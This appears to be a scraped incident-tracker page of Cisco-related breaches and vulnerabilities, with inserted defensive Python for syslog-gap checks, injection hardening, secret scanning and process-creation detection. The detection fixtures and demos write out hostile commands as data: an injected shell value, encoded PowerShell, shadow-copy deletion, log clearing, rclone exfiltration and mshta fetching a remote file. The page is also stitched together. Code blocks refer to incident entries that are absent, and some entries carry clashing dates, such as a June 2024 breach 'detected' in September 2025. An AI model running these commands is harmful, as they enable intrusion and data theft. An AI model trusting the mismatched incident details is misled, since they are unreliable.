The U.K. National Cyber Security Centre (NCSC) disclosed that state-sponsored threat actors (UAT4356/Storm-1849, linked to China) exploited zero-day vulnerabilities (CVE-2025-20362, CVE-2025-20333) in Cisco ASA 5500-X Series firewalls to deploy previously undocumented malware (RayInitiator, LINE VIPER). The attack targeted multiple government agencies, enabling persistent access, command execution, data exfiltration, and forensic evasion by modifying the ROMMON bootloader and disabling logging. The compromised devices—end-of-support (EoS) models lacking Secure Boot—were vulnerable to full system takeover, including root-level arbitrary code execution. The campaign demonstrated advanced operational security, with malware designed to survive reboots, suppress syslogs, and bypass VPN authentication. While no direct evidence confirmed large-scale data breaches, the targeting of government infrastructure and use of nation-state tools suggest high strategic impact, potentially threatening national security, critical services, and diplomatic stability. The attack’s sophistication and persistence mechanisms indicate a long-term espionage or sabotage intent, with risks extending beyond Cisco to broader supply-chain and geopolitical consequences.
INCIDENT DETAILS -
TYPE
Zero-day exploitation, Malware deployment (RayInitiator, LINE VIPER), Advanced Persistent Threat (APT), Supply chain risk (end-of-support devices)
MOTIVATION
Espionage, Data exfiltration, Persistence in government networks
IMPACT
Potential exfiltration from government agencies: VPN credentials (via AAA bypass), CLI commands (harvested), Packet captures; Cisco ASA 5500-X Series (5512-X, 5515-X, 5525-X, 5545-X, 5555-X, 5585-X); Devices running Cisco ASA Software 9.12 or 9.14 with VPN web services enabled; Intentional device crashes to evade analysis; Delayed reboots triggered by LINE VIPER; Compromised firewall integrity; Bypassed authentication (AAA); Suppressed syslog messages; Modified CLI commands (e.g., copy, verify); Potential loss of trust in Cisco ASA security products; Government agencies targeted; Potential risk if VPN credentials were exfiltrated
DATA BREACH
VPN authentication data, CLI command history, Network packet captures, Potential government data; High (government agencies targeted); Potential classified information; Likely (via LINE VIPER C2 channels)
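The syslog suppression and LINE VIPER-triggered reboots described above leave a negative signature that the compromised device cannot hide from an external collector: a firewall that normally logs continuously goes quiet, or reports a startup without a preceding operator reload. The Python below is an added example (not Cisco or NCSC tooling) of checking a collector's copy of the logs for both conditions. The log lines are constructed; message ids 199002 (startup completed) and 111008 (user executed command) are the standard ASA ones, while the five-minute silence threshold and fifteen-minute reload lookback are this example's assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ASA-style syslog as it would sit on a central collector, not a
# capture from any of the incidents on this page. fw1 goes silent for ~40 min
# and then reports a startup nobody asked for; fw2 reboots after a logged reload.
SAMPLE_LOG = """\
Sep 20 2025 10:00:05 fw1 %ASA-6-302013: Built outbound TCP connection 12001 for outside:203.0.113.10/443 to inside:10.0.0.5/51000
Sep 20 2025 10:00:35 fw1 %ASA-6-302014: Teardown TCP connection 12001 for outside:203.0.113.10/443 to inside:10.0.0.5/51000 duration 0:00:30 bytes 4312 TCP FINs
Sep 20 2025 10:01:10 fw1 %ASA-6-302013: Built outbound TCP connection 12002 for outside:203.0.113.11/443 to inside:10.0.0.7/51001
Sep 20 2025 10:41:55 fw1 %ASA-6-199002: Startup completed. Beginning operation.
Sep 20 2025 10:42:20 fw1 %ASA-6-302013: Built outbound TCP connection 1 for outside:203.0.113.12/443 to inside:10.0.0.9/51002
Sep 20 2025 10:00:00 fw2 %ASA-5-111008: User 'netops' executed the 'reload' command.
Sep 20 2025 10:03:30 fw2 %ASA-6-199002: Startup completed. Beginning operation.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{4} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"%ASA-(?P<sev>\d)-(?P<msgid>\d{6}): (?P<text>.*)$")

STARTUP_MSG = "199002"   # "Startup completed. Beginning operation."
COMMAND_MSG = "111008"   # "User 'x' executed the 'y' command."


def parse(log_text: str) -> list:
    """Parse collector lines into dicts; lines that do not match are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%b %d %Y %H:%M:%S"),
            "host": m["host"], "sev": int(m["sev"]),
            "msgid": m["msgid"], "text": m["text"],
        })
    return events


def by_host(events: list) -> dict:
    groups = defaultdict(list)
    for ev in events:
        groups[ev["host"]].append(ev)
    for evs in groups.values():
        evs.sort(key=lambda e: e["ts"])
    return groups


def find_silence(events: list, max_gap: timedelta = timedelta(minutes=5)) -> list:
    """Periods longer than max_gap with no message at all from a host. A busy
    firewall that stops talking is either down, disconnected, or muted."""
    gaps = []
    for host, evs in by_host(events).items():
        for prev, cur in zip(evs, evs[1:]):
            delta = cur["ts"] - prev["ts"]
            if delta > max_gap:
                gaps.append({"host": host, "start": prev["ts"], "end": cur["ts"],
                             "seconds": int(delta.total_seconds())})
    return gaps


def find_unexplained_reboots(events: list, lookback: timedelta = timedelta(minutes=15)) -> list:
    """Startup messages with no 'reload' command logged shortly before them."""
    hits = []
    for host, evs in by_host(events).items():
        for i, ev in enumerate(evs):
            if ev["msgid"] != STARTUP_MSG:
                continue
            explained = any(
                e["msgid"] == COMMAND_MSG and "reload" in e["text"]
                and ev["ts"] - e["ts"] <= lookback
                for e in evs[:i])
            if not explained:
                hits.append({"host": host, "ts": ev["ts"]})
    return hits


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    for g in find_silence(evs):
        print(f"{g['host']}: silent {g['seconds']}s between {g['start']:%H:%M:%S} and {g['end']:%H:%M:%S}")
    for r in find_unexplained_reboots(evs):
        print(f"{r['host']}: startup at {r['ts']:%H:%M:%S} with no preceding reload command")
```

Either finding on its own is only a lead; together on the same device they are the combination the NCSC report describes, and since LINE VIPER also tampers with on-box commands such as copy and verify, the collector's copy is the evidence to preserve before anyone logs in to the firewall to "check".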
MAY 2025
478Before Incident
Vulnerability
01 May 2025Cisco
Cisco

Critical Remote Code Execution Vulnerability in Cisco Secure Firewall Management Center (FMC) Software (CVE-2025-20265)

477After Incident
CRITICAL-1
CIS751081525
Cisco disclosed CVE-2025-20265, a critical (CVSS 10.0) remote code execution (RCE) vulnerability in its Secure Firewall Management Center (FMC) Software, affecting versions 7.0.7 and 7.7.0 when RADIUS authentication is enabled for the web or SSH management interface. The flaw stems from improper input validation during RADIUS credential processing, which lets an unauthenticated attacker inject and execute arbitrary shell commands with high privileges by sending crafted credentials. No authentication or user interaction is required. The vulnerability enables full compromise of the firewall management plane, and from there lateral movement, data exfiltration, or takeover of the managed firewalls. No public exploitation had been reported at the time of disclosure, but the only mitigation short of patching is to disable RADIUS authentication, which may disrupt operational workflows, so the critical severity calls for immediate patching. The flaw was found during Cisco’s internal security testing. Organizations that do not patch risk unauthorized access to sensitive networks, credential theft, and downstream attacks on connected systems.
INCIDENT DETAILS -
TYPE
Vulnerability Disclosure, Remote Code Execution (RCE), Command Injection
IMPACT
Cisco Secure Firewall Management Center (FMC) Software (versions 7.0.7, 7.7.0 with RADIUS enabled); Potential disruption if RADIUS authentication is disabled (requires reconfiguration to LDAP/SAML/local accounts); Emergency patching may require maintenance windows; High (critical vulnerability in enterprise firewall infrastructure)
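The ISE flaw above (command injection reached through enableStrongSwanTunnel()) and CVE-2025-20265 (shell command injection during RADIUS credential processing) are both instances of one bug class: attacker-controlled text spliced into a command line that a privileged helper hands to a shell. The Python below is an added, generic illustration of that class and its fix; it is not Cisco's code and does not reproduce either product's logic. A harmless `echo` stands in for the privileged helper, the peer-name allowlist is an assumption, and the deserialization half of the ISE bug is not shown.

```python
import re
import subprocess

# Stand-in for a privileged helper such as an ipsec/strongSwan wrapper. 'echo' is
# used so the example is harmless and runs anywhere; in the products described
# above the helper runs as root, which is why injection there means root RCE.
HELPER = "echo"

# What an attacker might submit where a tunnel/peer name (or a RADIUS username)
# is expected: a valid-looking value followed by a shell separator and a command.
PAYLOAD = "peer1; echo INJECTED"


def run_tunnel_unsafe(peer_name: str) -> str:
    # VULNERABLE pattern: untrusted text becomes part of a shell command line, so
    # ';', '&&', '|', '$(...)' and backticks are interpreted by /bin/sh.
    cmd = f"{HELPER} up {peer_name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_tunnel_argv_only(peer_name: str) -> str:
    # Better: an argv list and no shell. The whole string is delivered to the
    # helper as ONE argument; the metacharacters arrive literally. Still no
    # validation, so the helper itself had better not re-interpret them.
    return subprocess.run([HELPER, "up", peer_name], capture_output=True, text=True).stdout


# Allowlist for a peer name: alphanumerics, dot, underscore, dash, at most 64 chars.
# (Assumed format for this example.)
PEER_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def run_tunnel_safe(peer_name: str) -> str:
    # HARDENED: reject anything outside the allowlist (never try to "sanitize"
    # by stripping characters), then invoke the helper without a shell.
    if not PEER_NAME_RE.fullmatch(peer_name):
        raise ValueError(f"rejected peer name: {peer_name!r}")
    return subprocess.run([HELPER, "up", peer_name], capture_output=True, text=True).stdout


if __name__ == "__main__":
    print("unsafe :", repr(run_tunnel_unsafe(PAYLOAD)))      # a second line, INJECTED, is printed
    print("argv   :", repr(run_tunnel_argv_only(PAYLOAD)))   # payload echoed back as plain text
    try:
        run_tunnel_safe(PAYLOAD)
    except ValueError as err:
        print("safe   :", err)
    print("safe ok:", repr(run_tunnel_safe("peer1")))
```

The two layers are deliberately separate: dropping the shell stops the injection even if validation is forgotten somewhere, and validation protects against helpers that parse their own arguments. When reviewing code paths like the ones these advisories describe, the question to ask at every call that spawns a process is which of the two layers is present, and whether the value came from an authenticated peer or, as with RADIUS credentials, from anyone who can reach the login prompt.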
JANUARY 2025
482Before Incident
Breach
01 Jan 2025Cisco
Canadian Tire, Cisco, VMware and Juniper: Security Affairs newsletter Round 565 by Pierluigi Paganini – INTERNATIONAL EDITION

Cybersecurity Roundup: Major Breaches, State-Backed Threats, and Critical Vulnerabilities

450After Incident
CRITICAL-32
CISVMWJUNCAN1772332146
Cybersecurity Roundup: Major Breaches, State-Backed Threats, and Critical Vulnerabilities
A wave of high-profile cyber incidents, state-sponsored attacks, and critical vulnerabilities has dominated recent cybersecurity news.
Law Enforcement Actions & Espionage
Spanish police arrested a young hacker for exploiting a payment gateway to book luxury hotel stays for just one cent. Meanwhile, a former U.S. defense contractor executive received an 87-month prison sentence for selling stolen trade secrets, including zero-day exploits, to a Russian broker. In a separate case, a Romanian national pleaded guilty to selling unauthorized access to Oregon state government networks and other U.S. victims.
State-Backed Threats & APT Activity
Google’s Threat Intelligence Group (GTIG) disrupted a China-linked APT, UNC2814, halting attacks on 53 organizations across 42 countries. The Lazarus Group, a North Korean APT, deployed Medusa ransomware against a Middle East target, while APT28 (Russia) launched Operation MacroMaze, exploiting webhooks for covert data exfiltration. Dutch intelligence warned of Russia escalating hybrid attacks, preparing for a prolonged standoff with Western nations.
Critical Vulnerabilities & Exploits
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple flaws to its Known Exploited Vulnerabilities (KEV) catalog, including:
- A Soliton Systems K.K FileZen vulnerability.
- Cisco SD-WAN flaws, abused since 2023 for full admin control.
- BeyondTrust (CVE-2026-1731) and VMware Aria Operations vulnerabilities enabling remote attacks.
Juniper issued an emergency patch for a critical PTX router RCE flaw, while Check Point researchers exposed flaws in Claude Code that could turn untrusted repositories into attack vectors.
Ransomware & Data Breaches
- Everest ransomware hit Vikor Scientific’s supplier, stealing data of 140,000 patients.
- ShinyHunters breached CarGurus, exposing 12.4 million users.
- ManoMano, a European DIY chain, suffered a breach impacting 38 million customers.
- Canadian Tire disclosed a 2025 breach affecting 38 million users.
- Olympique Marseille confirmed an attempted cyberattack following a data leak.
Emerging Threats & AI Risks
- 12 million exposed .env files revealed widespread security misconfigurations.
- Aeternum, a new botnet, hides commands in Polygon smart contracts.
- An AI-powered campaign compromised 600 FortiGate systems globally.
- Arkanix Stealer, an AI-assisted info-stealer, briefly operated before shutting down.
- CrowdStrike reported attackers moving through networks in under 30 minutes.
Geopolitical & Industry Developments
- Apple’s iPhone and iPad became the first consumer devices cleared for NATO ‘RESTRICTED’ classification.
- The U.S. Treasury sanctioned an exploit broker network for theft and sale of government cyber tools.
- Iran’s internet faced near-total blackouts amid U.S. and Israeli strikes.
- Ukraine reported cyberattacks on its energy grid being used to guide missile strikes.
Malware & Campaigns
- UAT-10027, a stealthy campaign, targeted U.S. education and healthcare with the Dohdoor backdoor.
- Starkiller, a phishing service, proxies real login pages, including MFA.
- North Korean actors deployed Medusa ransomware in a Middle East attack.
- A wormable XMRig campaign used BYOVD (Bring Your Own Vulnerable Driver) and a timed kill switch for stealth.
The past week underscored the growing sophistication of cyber threats, from state-sponsored espionage to AI-driven attacks and large-scale data breaches.
INCIDENT DETAILS -
TYPE
APT Activity, Ransomware, Data Breach, Vulnerability Exploitation, Espionage, Malware Campaign
MOTIVATION
Financial Gain, Espionage, Data Theft, Sabotage, Geopolitical
IMPACT
140,000 patients (Vikor Scientific supplier); 12.4 million users (CarGurus); 38 million customers (ManoMano); 38 million users (Canadian Tire); Payment gateways, Government networks, Healthcare systems, E-commerce platforms, Energy grids, NATO-classified devices; Disrupted services, Data exfiltration, Network compromise; Olympique Marseille, Canadian Tire, ManoMano
DATA BREACH
Patient data, User data, Customer data, Trade secrets, Government network access; 140,000; 12.4 million; 38 million; 38 million; High; Medium; Yes; Yes (Ransomware); .env files; Yes
DECEMBER 2024
477Before Incident
Vulnerability
03 Dec 2024Cisco
Fortinet, Cisco, Amazon Web Services and JPMorgan Chase: Cloud storage buckets leaking secret data despite security improvements

Toxic Cloud Trilogies: Publicly Exposed, Critically Vulnerable, and Highly Privileged Cloud Buckets

476After Incident
CRITICAL-1
FORCISAMAJPM1767748297
Tenable Report Highlights Persistent Cloud Security Risks Despite Improvements
A recent report by Tenable reveals both progress and ongoing weakness in cloud security, particularly around "toxic cloud trilogies": workloads that are publicly exposed, critically vulnerable, and highly privileged at the same time. Between October 2024 and March 2025, the share of organizations with at least one such instance on AWS or Google Cloud Platform (GCP) dropped from 38% to 29%, and the share with five or more fell from 27% to 13%. Despite the improvement, Tenable warns that such exposures remain a pressing concern. The report also found sensitive data embedded directly in cloud configuration: 54% of AWS Elastic Container Service (ECS) task definitions and 52% of Google Cloud Run environment variables contained confidential information. Over a quarter of AWS users stored sensitive data in EC2 user-data fields, and 3.5% of EC2 instances held secrets there, which is a significant risk because anyone who can describe the instance can read them. AWS hosted the highest proportion of sensitive data (16.7% of its buckets), compared with 6.5% for GCP and 3.2% for Microsoft Azure. Nearly 80% of AWS users have enabled critical identity-checking services, but the findings point to persistent misconfiguration and overconfidence in cloud security posture. The report, released at AWS re:Invent 2024 in Las Vegas, highlights the need for continued vigilance in securing cloud environments.
INCIDENT DETAILS -
TYPE
Data Exposure
IMPACT
Data Compromised: Sensitive data, including confidential and restricted information; Systems Affected: AWS S3 Buckets, GCP Cloud Storage, AWS Elastic Container Service, Google Cloud Run, AWS EC2 User Data; Operational Impact: Potential cascade of exploitative activity by attackers accessing exposed secrets; Brand Reputation Impact: High (due to sensitive data exposure); Identity Theft Risk: High (due to exposure of personally identifiable information)
DATA BREACH
Secrets, Confidential data, Restricted data, Personally identifiable information; Sensitivity Of Data: High (confidential/restricted); Personally Identifiable Information: Yes
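Two entries above share a remediation: the Salesloft/Drift intrusion mined stolen Salesforce Case records for AWS keys and other credentials that had ended up in support-ticket text, and Tenable's report counts secrets sitting in ECS task definitions and EC2 user data. Defenders can run the same search before an attacker does. The Python below is an added example (not Tenable's, Salesforce's or Mandiant's tooling) that scans a Case CSV export, an ECS task-definition JSON and an EC2 user-data script for well-known credential shapes. All three inputs are constructed, the AWS key values are AWS's documented placeholder examples, and the password and secret-name heuristics are this example's own assumptions; Snowflake tokens are not matched because their format is not specified here.

```python
import csv
import io
import json
import re

# Well-known credential shapes. The AWS key id/secret lengths and GitHub's ghp_
# prefix are documented formats; the password and env-name heuristics are this
# example's assumptions and will produce false positives that need review.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws[_-]?secret[_-]?access[_-]?key\W{0,3}([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*\S{6,}"),
}
SENSITIVE_ENV_NAME = re.compile(r"(?i)(secret|password|passwd|token|api[_-]?key|private[_-]?key)")

# --- constructed inputs; AWS key values are AWS's documented placeholders ---
CASE_CSV = """\
CaseNumber,Subject,Description
00001001,Login issue,"Cannot log in since yesterday, the reset link has expired."
00001002,Nightly sync failing,"Sync job dies at 02:00. Our config: aws_access_key_id=AKIAIOSFODNN7EXAMPLE aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
00001003,Temp credentials,"The temporary account you sent (password=Winter2025!) stopped working today"
"""
ECS_TASK_DEF = json.dumps({
    "family": "billing-api",
    "containerDefinitions": [{
        "name": "api",
        "environment": [
            {"name": "DB_HOST", "value": "db.internal"},
            {"name": "DB_PASSWORD", "value": "S3cr3t-Pa55"},   # plain env var: readable by anyone with DescribeTaskDefinition
            {"name": "LOG_LEVEL", "value": "info"},
        ],
        # The right shape: a reference resolved at task start, not a value.
        "secrets": [{"name": "API_TOKEN",
                     "valueFrom": "arn:aws:secretsmanager:us-east-1:123456789012:secret:api-token"}],
    }],
})
EC2_USER_DATA = """\
#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
/opt/app/bootstrap.sh
"""


def redact(value: str) -> str:
    """Keep a short prefix only, so the report itself never re-leaks the secret."""
    return value[:6] + "..." if len(value) > 6 else "***"


def scan_text(text: str, source: str, locator: str = "") -> list:
    findings = []
    for kind, pattern in SECRET_PATTERNS.items():
        for m in pattern.finditer(text):
            findings.append({"source": source, "locator": locator,
                             "kind": kind, "redacted": redact(m.group(0))})
    return findings


def scan_case_csv(csv_text: str) -> list:
    """Salesforce Case export: Subject and Description are free text typed by
    customers and agents, which is exactly where pasted keys end up."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for field in ("Subject", "Description"):
            findings += scan_text(row.get(field, ""), "salesforce-case",
                                  f"{row['CaseNumber']}/{field}")
    return findings


def scan_ecs_task_definition(json_text: str) -> list:
    """Flag plain 'environment' entries whose name or value looks secret;
    'secrets' entries (valueFrom an ARN) are the correct pattern and are skipped."""
    findings = []
    task = json.loads(json_text)
    for container in task.get("containerDefinitions", []):
        for env in container.get("environment", []):
            name, value = env.get("name", ""), str(env.get("value", ""))
            locator = f"{container.get('name')}/{name}"
            if value and SENSITIVE_ENV_NAME.search(name):
                findings.append({"source": "ecs-task-definition", "locator": locator,
                                 "kind": "sensitive_env_name", "redacted": redact(value)})
            findings += scan_text(value, "ecs-task-definition", locator)
    return findings


def scan_all() -> list:
    return (scan_case_csv(CASE_CSV)
            + scan_ecs_task_definition(ECS_TASK_DEF)
            + scan_text(EC2_USER_DATA, "ec2-user-data", "i-0123456789abcdef0"))


if __name__ == "__main__":
    for f in scan_all():
        print(f"{f['source']:<20} {f['locator']:<24} {f['kind']:<22} {f['redacted']}")
```

A hit in Case text means the credential is already shared with everyone who can read that ticket, including any connected app holding the Case object scope, so the response is rotation, not deletion of the ticket. For task definitions and user data the fix is structural: move the value behind a `secrets`/`valueFrom` reference or an instance role, then rotate, because prior revisions of a task definition remain readable.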
JUNE 2024
505Before Incident
Cyber Attack
16 Jun 2024Cisco
Cisco

Hackers hit the United States: Critical federal infrastructure compromised via Cisco networking equipment breach

435After Incident
CRITICAL-70
CIS2032020092825
Hackers, specifically the ArcaneDoor group linked to Russian state actors, exploited zero-day vulnerabilities (CVE-2024-20353 and CVE-2024-20359) in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software—critical components of U.S. federal cyber infrastructure. The breach, detected on September 26, 2025, allowed attackers to execute remote denial-of-service (DoS) attacks via infinite loops and escalate privileges from administrator to root access, compromising hundreds of Cisco firewall devices used by U.S. government agencies. Classified documents were stolen, including intelligence on espionage, fraud, money laundering, and foreign agent activities, directly threatening national security. The attack follows a 2024 pattern where Cisco’s systems were repeatedly targeted, with CISA issuing emergency directives to mitigate further damage. The incident underscores systemic vulnerabilities in federal cyber defenses, with experts warning of escalating threats as other cybercriminal groups adopt ArcaneDoor’s tactics.
INCIDENT DETAILS -
TYPE
Cyberattack, Privilege Escalation, Denial-of-Service (DoS), Data Breach
MOTIVATION
Espionage, Cyber Warfare, Financial Gain (potential sale of exploit methods)
IMPACT
Classified documents (espionage, fraud, money laundering, foreign agent activities); Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD) software, Hundreds of Cisco firewall devices, U.S. federal courts computer systems; Disruption of federal cyber infrastructure, Potential loss of sensitive government data, Erosion of public trust in U.S. federal cybersecurity, Reputational damage to Cisco
DATA BREACH
Classified government documents, Espionage-related data, Fraud/money laundering records, Foreign agent activities; Sensitivity Of Data: High (Classified)
Ransomware
16 Jun 2024Cisco
SonicWall

Akira Ransomware Attacks Exploiting SonicWall SSL VPN Vulnerability (CVE-2024-40766)

435After Incident
CRITICAL-70
SON0492204092925
The Akira ransomware group exploited CVE-2024-40766, an improper access control flaw in SonicWall SonicOS SSL VPN, to breach organizations in under four hours. The attackers reused stolen credentials, harvested months earlier from unpatched devices or from Gen 6-to-Gen 7 firewall migrations in which local user passwords were carried over without being reset, and bypassed MFA through misconfigured SSLVPN Default Users Group settings and OTP manipulation. Once inside, they moved laterally via SMB (Impacket) and RDP, compromised Domain Controllers, and exfiltrated data with WinRAR, rclone, and FileZilla before deploying Akira ransomware. The attackers disabled EDR tools, deleted Volume Shadow Copies, and cleared event logs, crippling recovery and investigation. Victims spanned multiple industries; SonicWall’s cloud backup service was also targeted in a separate incident. The breach highlights that credential reuse defeats patching, since a fixed appliance still accepts a password stolen before the fix, and it shows the speed of current ransomware operations. Organizations were urged to reset all SSL VPN and LDAP credentials and to monitor for logins from VPS and hosting-provider address space, SMB anomalies, and unauthorized archiving or sync tools.
INCIDENT DETAILS -
TYPE
Ransomware, Data Breach, Credential Abuse, Lateral Movement
MOTIVATION
Financial Gain (Ransomware), Data Theft (Double Extortion)
IMPACT
Data Compromised: Yes (exfiltrated prior to encryption); Systems Affected: Domain Controllers, virtual machine storage, backup systems, endpoints with RMM/EDR tools; Operational Impact: system encryption, data exfiltration, disruption of backup/recovery processes; Brand Reputation Impact: High (public disclosure of breaches); Identity Theft Risk: Potential (PII likely exfiltrated)
DATA BREACH
Sensitive corporate data, Potentially PII, Virtual machine storage, Backup data; Sensitivity Of Data: High; Data Exfiltration: Yes (via rclone/FileZilla to attacker-controlled VPS); Data Encryption: Yes (Akira ransomware); Personally Identifiable Information: Likely (not specified)
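The ClickFix chain in the Kettering Health entry (the user pastes a clipboard payload, so powershell.exe or mshta.exe is spawned by explorer.exe with an encoded or remote command) and the Akira post-compromise steps above (shadow-copy deletion, event-log clearing, rclone exfiltration) all show up in the same place: process-creation telemetry. The Python below is an added example of rule logic over Sysmon-style Event ID 1 fields, serving both entries; the events are constructed, not telemetry from either incident, and the process and indicator lists are this example's assumptions to be tuned per environment.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (Event ID 1 fields). These are
# illustrative records, not telemetry from the Kettering Health or Akira cases.
EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe",          # admin opening a console: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"id": 4, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": "wevtutil cl Security"},
    {"id": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\svc_backup\Downloads\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Shares\Finance mega:loot --transfers 8"},
    {"id": 6, "ParentImage": r"C:\Windows\System32\services.exe",  # ordinary service host: benign
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    {"id": 7, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://cdn.example.invalid/verify.hta"},
]

# Processes a pasted ClickFix command typically lands in (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "msiexec.exe"}
# Encoded-command, download-cradle or remote-content indicators (assumed list).
REMOTE_OR_ENCODED = re.compile(
    r"(-enc\b|-e\b|-ec\b|encodedcommand|\biex\b|invoke-expression|downloadstring|"
    r"invoke-webrequest|https?://|\.hta\b)")


def rule_clickfix_run_dialog(parent, image, cmd):
    # Win+R and pasted commands run as children of explorer.exe. So does a
    # console an admin opens by hand, hence the extra payload condition.
    return parent == "explorer.exe" and image in SCRIPT_HOSTS and bool(REMOTE_OR_ENCODED.search(cmd))


def rule_shadow_copy_deletion(parent, image, cmd):
    return ((image == "vssadmin.exe" and "delete" in cmd and "shadows" in cmd)
            or (image == "wmic.exe" and "shadowcopy" in cmd and "delete" in cmd)
            or ("win32_shadowcopy" in cmd and "delete" in cmd))


def rule_event_log_clear(parent, image, cmd):
    return ((image == "wevtutil.exe" and re.search(r"\b(cl|clear-log)\b", cmd) is not None)
            or "clear-eventlog" in cmd)


def rule_rclone_exfil(parent, image, cmd):
    # rclone is often renamed by intruders; matching the binary name plus an
    # upload verb is the simple form, hashing the image is the stronger one.
    return image == "rclone.exe" and re.search(r"\b(copy|sync|move)\b", cmd) is not None


RULES = [rule_clickfix_run_dialog, rule_shadow_copy_deletion, rule_event_log_clear, rule_rclone_exfil]


def detect(events: list) -> list:
    """Return (event id, rule name) pairs for every rule each event triggers."""
    hits = []
    for ev in events:
        parent = PureWindowsPath(ev["ParentImage"]).name.lower()
        image = PureWindowsPath(ev["Image"]).name.lower()
        cmd = ev["CommandLine"].lower()
        for rule in RULES:
            if rule(parent, image, cmd):
                hits.append((ev["id"], rule.__name__[len("rule_"):]))
    return hits


if __name__ == "__main__":
    for event_id, rule_name in detect(EVENTS):
        print(f"event {event_id}: {rule_name}")
```

The ClickFix rule is the one that earns its keep early: the Kettering write-up notes that nothing crossed the email gateway, so the first observable is that explorer.exe child with an encoded or remote command. The impact rules fire late, after exfiltration has usually started, which is why the Akira entry's advice to hunt for archiving and sync tools matters more than any single alert.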
APRIL 2024
490Before Incident
Vulnerability
01 Apr 2024Cisco
Cisco

Velvet Ant APT Group Exploits Cisco Switches

489After Incident
CRITICAL-1
CIS000082424
In April 2024, the China-linked APT group Velvet Ant exploited CVE-2024-20399, a then-unpatched command injection flaw in the CLI of Cisco NX-OS switches, to deploy custom malware and take control of the devices. An attacker who already held valid administrator credentials could execute commands as root on the underlying operating system, bypassing NX-OS security controls and installing the 'VELVETSHELL' malware for persistent access and espionage. The malware provided command execution, file management, and traffic tunneling, compromising the integrity of the victims' Cisco network infrastructure and potentially enabling data exfiltration.
INCIDENT DETAILS -
TYPE
Advanced Persistent Threat (APT)
MOTIVATION
Espionage
IMPACT
Systems Affected: Cisco switches
JANUARY 2024
635Before Incident
Ransomware
18 Jan 2024Cisco
Cisco: Russian Access Broker Gets Nearly 7 Yrs for Enabling Millions in Ransomware Extortion

Russian Access Broker Sentenced for Fueling $24M in Ransomware Attacks

474After Incident
CRITICAL-161
CIS1774355311
Russian Access Broker Sentenced to Over 6 Years for Fueling $24M in Ransomware Attacks
A 26-year-old Russian national, Aleksei Volkov of St. Petersburg, was sentenced to 81 months in prison by a federal court in the Southern District of Indiana for his role as an initial access broker, a key player in the ransomware economy. Volkov facilitated dozens of cyberattacks across the U.S., enabling criminal groups such as the Yanluowang ransomware operation to breach networks, encrypt data, and extort victims for millions. Operating as a middleman, Volkov specialized in obtaining and selling unauthorized network access to cybercriminals, who then deployed ransomware. His activities resulted in over $9 million in confirmed losses and $24 million in intended damages, with victims ranging from businesses to critical organizations. The Yanluowang group, one of his buyers, previously claimed responsibility for a 2022 breach of Cisco’s corporate network, underscoring the high-profile risk posed by access brokers. Volkov was arrested in Italy on January 18, 2024, after a Bitcoin transaction linked him to the cybercrime network. Extradited to the U.S., he pleaded guilty to aggravated identity theft and access device fraud, agreeing to pay $9.17 million in restitution to victims. In addition to his prison term, he received two years of supervised release. The case highlights the supply-chain dynamics of modern ransomware, where access brokers like Volkov provide the initial foothold that ransomware groups often lack the expertise to obtain themselves. Prosecutors emphasized that targeting these brokers disrupts the economic viability of ransomware campaigns, forcing criminal networks either to develop costly in-house intrusion capabilities or to expand their supplier base, both of which increase their exposure to law enforcement.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial Gain
IMPACT
Financial Loss: $9 million (confirmed losses), $24 million (intended damages)Identity Theft Risk: Aggravated Identity Theft
DATA BREACH
Data Encryption: Yes (Ransomware Encryption)
NOVEMBER 2023
575Before Incident
Data Leak
01 Nov 2023Cisco
Cisco

Cisco Professional Careers Portal Data Leak

551After Incident
HIGH-24
CIS1221121123
